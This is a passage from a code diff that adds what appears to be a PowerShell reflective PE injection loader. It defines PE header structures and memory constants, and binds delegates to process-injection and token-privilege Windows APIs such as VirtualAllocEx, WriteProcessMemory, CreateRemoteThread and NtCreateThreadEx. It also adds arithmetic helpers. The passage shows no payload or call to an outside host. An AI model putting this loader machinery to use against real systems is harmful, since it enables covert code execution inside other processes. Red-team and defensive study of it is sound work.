+ $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
462
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
463
+
464
+ #Struct IMAGE_DOS_HEADER
465
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
466
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
467
+ $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
468
+ $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
469
+ $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
470
+ $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
471
+ $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
472
+ $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
473
+ $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
474
+ $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
475
+ $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
476
+ $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
477
+ $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
478
+ $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
479
+ $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
480
+ $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
481
+
482
+ $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
483
+ $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
484
+ $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
485
+ $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
486
+ $e_resField.SetCustomAttribute($AttribBuilder)
487
+
488
+ $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
489
+ $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
490
+
491
+ $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
492
+ $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
493
+ $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
494
+ $e_res2Field.SetCustomAttribute($AttribBuilder)
495
+
496
+ $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
497
+ $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
498
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
499
+
500
+ #Struct IMAGE_SECTION_HEADER
501
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
502
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
503
+
504
+ $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
505
+ $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
506
+ $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
507
+ $nameField.SetCustomAttribute($AttribBuilder)
508
+
509
+ $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
510
+ $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
511
+ $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
512
+ $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
513
+ $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
514
+ $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
515
+ $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
516
+ $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
517
+ $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
518
+ $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
519
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
520
+
521
+ #Struct IMAGE_BASE_RELOCATION
522
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
523
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
524
+ $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
525
+ $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
526
+ $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
527
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION
528
+
529
+ #Struct IMAGE_IMPORT_DESCRIPTOR
530
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
531
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
532
+ $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
533
+ $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
534
+ $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
535
+ $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
536
+ $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
537
+ $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
538
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR
539
+
540
+ #Struct IMAGE_EXPORT_DIRECTORY
541
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
542
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
543
+ $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
544
+ $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
545
+ $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
546
+ $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
547
+ $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
548
+ $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
549
+ $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
550
+ $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
551
+ $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
552
+ $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
553
+ $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
554
+ $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
555
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
556
+
557
+ #Struct LUID
558
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
559
+ $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
560
+ $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
561
+ $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
562
+ $LUID = $TypeBuilder.CreateType()
563
+ $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID
564
+
565
+ #Struct LUID_AND_ATTRIBUTES
566
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
567
+ $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
568
+ $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
569
+ $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
570
+ $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
571
+ $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES
572
+
573
+ #Struct TOKEN_PRIVILEGES
574
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
575
+ $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
576
+ $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
577
+ $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
578
+ $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
579
+ $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES
580
+
581
+ return $Win32Types
582
+ }
583
+
584
+ Function Get-Win32Constants
585
+ {
586
+ $Win32Constants = New-Object System.Object
587
+
588
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
589
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
590
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
591
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
592
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
593
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
594
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
595
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
596
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
597
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
598
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
599
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
600
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
601
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
602
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
603
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
604
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
605
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
606
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
607
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
608
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
609
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
610
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
611
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
612
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
613
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
614
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
615
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
616
+ $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
617
+
618
+ return $Win32Constants
619
+ }
620
+
621
+ Function Get-Win32Functions
622
+ {
623
+ $Win32Functions = New-Object System.Object
624
+
625
+ $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
626
+ $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
627
+ $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
628
+ $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc
629
+
630
+ $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
631
+ $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
632
+ $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
633
+ $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx
634
+
635
+ $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
636
+ $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
637
+ $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
638
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy
639
+
640
+ $memsetAddr = Get-ProcAddress msvcrt.dll memset
641
+ $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
642
+ $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)
643
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset
644
+
645
+ $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
646
+ $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
647
+ $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
648
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary
649
+
650
+ $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
651
+ $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
652
+ $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
653
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress
654
+
655
+ $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress #This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself
656
+ $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])
657
+ $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate)
658
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr
659
+
660
+ $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
661
+ $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
662
+ $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
663
+ $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree
664
+
665
+ $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx
666
+ $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
667
+ $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)
668
+ $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx
669
+
670
+ $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect
671
+ $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
672
+ $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)
673
+ $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect
674
+
675
+ $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
676
+ $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
677
+ $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
678
+ $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
679
+
680
+ $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
681
+ $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr])
682
+ $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
683
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
684
+
685
+ $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
686
+ $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
687
+ $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
688
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess
689
+
690
+ $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
691
+ $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])
692
+ $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
693
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject
694
+
695
+ $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
696
+ $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
697
+ $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
698
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory
699
+
700
+ $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory
701
+ $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
702
+ $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)
703
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory
704
+
705
+ $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
706
+ $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
707
+ $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
708
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread
709
+
710
+ $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread
711
+ $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])
712
+ $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)
713
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread
714
+
715
+ $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken
716
+ $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
717
+ $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)
718
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken
719
+
720
+ $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread
721
+ $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])
722
+ $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)
723
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread
724
+
725
+ $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
726
+ $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
727
+ $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)
728
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges
729
+
730
+ $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA
731
+ $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])
732
+ $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)
733
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue
734
+
735
+ $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf
736
+ $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])
737
+ $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
738
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf
739
+
740
+ $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
741
+ $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
742
+ $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
743
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
744
+
745
+ $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
746
+ $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
747
+ $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
748
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process
749
+
750
+ $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread
751
+ $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
752
+ $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
753
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread
754
+
755
+ return $Win32Functions
756
+ }
757
+ #####################################
758
+
759
+
760
+ #####################################
761
+ ########### HELPERS ############
762
+ #####################################
763
+
764
+ #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function
765
+ #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses
766
+ Function Sub-SignedIntAsUnsigned
767
+ {
768
+ Param(
769
+ [Parameter(Position = 0, Mandatory = $true)]
770
+ [Int64]
771
+ $Value1,
772
+
773
+ [Parameter(Position = 1, Mandatory = $true)]
774
+ [Int64]
775
+ $Value2
776
+ )
777
+
778
+ [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
779
+ [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
780
+ [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
781
+
782
+ if ($Value1Bytes.Count -eq $Value2Bytes.Count)
783
+ {
784
+ $CarryOver = 0
785
+ for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
786
+ {
787
+ $Val = $Value1Bytes[$i] - $CarryOver
788
+ #Sub bytes
789
+ if ($Val -lt $Value2Bytes[$i])
790
+ {
791
+ $Val += 256
792
+ $CarryOver = 1
793
+ }
794
+ else
795
+ {
796
+ $CarryOver = 0
797
+ }
798
+
799
+
800
+ [UInt16]$Sum = $Val - $Value2Bytes[$i]
801
+
802
+ $FinalBytes[$i] = $Sum -band 0x00FF
803
+ }
804
+ }
805
+ else
806
+ {
807
+ Throw "Cannot subtract bytearrays of different sizes"
808
+ }
809
+
810
+ return [BitConverter]::ToInt64($FinalBytes, 0)
811
+ }
812
+
813
+
814
+ Function Add-SignedIntAsUnsigned
815
+ {
816
+ Param(
817
+ [Parameter(Position = 0, Mandatory = $true)]
818
+ [Int64]
819
+ $Value1,
820
+
821
+ [Parameter(Position = 1, Mandatory = $true)]
822
+ [Int64]
823
+ $Value2
824
+ )
825
+
826
+ [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
827
+ [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
828
+ [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
829
+
830
+ if ($Value1Bytes.Count -eq $Value2Bytes.Count)
831
+ {
832
+ $CarryOver = 0
833
+ for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
834
+ {
835
+ #Add bytes
836
+ [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
837
+
838
+ $FinalBytes[$i] = $Sum -band 0x00FF
839
+
840
+ if (($Sum -band 0xFF00) -eq 0x100)
841
+ {
842
+ $CarryOver = 1
843
+ }
844
+ else
845
+ {
846
+ $CarryOver = 0
847
+ }
848
+ }
849
+ }
850
+ else
851
+ {
852
+ Throw "Cannot add bytearrays of different sizes"
853
+ }
854
+
855
+ return [BitConverter]::ToInt64($FinalBytes, 0)
856
+ }
857
+
858
+
859
+ Function Compare-Val1GreaterThanVal2AsUInt
860
+ {
861
+ Param(
862
+ [Parameter(Position = 0, Mandatory = $true)]
863
+ [Int64]
864
+ $Value1,
865
+
866
+ [Parameter(Position = 1, Mandatory = $true)]
867
+ [Int64]
868
+ $Value2
869
+ )
870
+
871
+ [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
872
+ [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
873
+
874
+ if ($Value1Bytes.Count -eq $Value2Bytes.Count)
875
+ {
876
+ for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)
877
+ {
878
+ if ($Value1Bytes[$i] -gt $Value2Bytes[$i])
879
+ {
880
+ return $true
881
+ }
882
+ elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])
883
+ {
884
+ return $false
885
+ }
886
+ }
887
+ }
888
+ else
889
+ {
890
+ Throw "Cannot compare byte arrays of different size"
891
+ }
892
+
893
+ return $false
894
+ }
895
+
896
+
897
+ Function Convert-UIntToInt
898
+ {
899
+ Param(
900
+ [Parameter(Position = 0, Mandatory = $true)]
901
+ [UInt64]
902
+ $Value
903
+ )
904
+
905
+ [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)
906
+ return ([BitConverter]::ToInt64($ValueBytes, 0))
907
+ }
908
+
909
+
910
+ Function Get-Hex
911
+ {
912
+ Param(
913
+ [Parameter(Position = 0, Mandatory = $true)]
914
